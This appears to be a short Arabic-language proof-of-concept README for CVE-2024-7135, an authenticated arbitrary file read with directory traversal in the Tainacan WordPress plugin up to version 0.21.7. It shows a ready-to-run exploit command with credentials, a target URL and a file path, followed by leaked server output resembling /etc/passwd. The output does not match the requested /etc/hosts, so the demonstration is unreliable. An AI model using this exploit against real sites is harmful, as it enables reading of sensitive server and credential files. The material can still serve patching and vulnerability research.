
Tainacan <= 0.21.7 - نقص التفويض للمستخدمين المُوثَّقين (Subscriber+) لقراءة ملفات عشوائية
Tainacan <= 0.21.7 - نقص في التفويض يسمح للمستخدمين المصادق عليهم (مشترك+) بقراءة ملفات عشوائية
إضافة Tainacan لووردبريس معرضة للوصول غير المصرح به إلى البيانات بسبب عدم وجود فحص للصلاحية في دالة 'get_file' في جميع الإصدارات حتى 0.21.7. الدالة أيضًا معرضة لاجتياز الدليل. وهذا يجعل من الممكن للمهاجمين المصادق عليهم، بمستوى وصول مشترك فما فوق، قراءة محتويات ملفات عشوائية على الخادم، والتي قد تحتوي على معلومات حساسة.
Type: plugin
CVSS Score: 6.5
CVE: CVE-2024-7135
Link: https://downloads.wordpress.org/plugin/tainacan.0.21.7.zip
python3 CVE-2024-7135.py -un user -p user --url http://kubernetes.docker.internal -f /etc/hosts
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin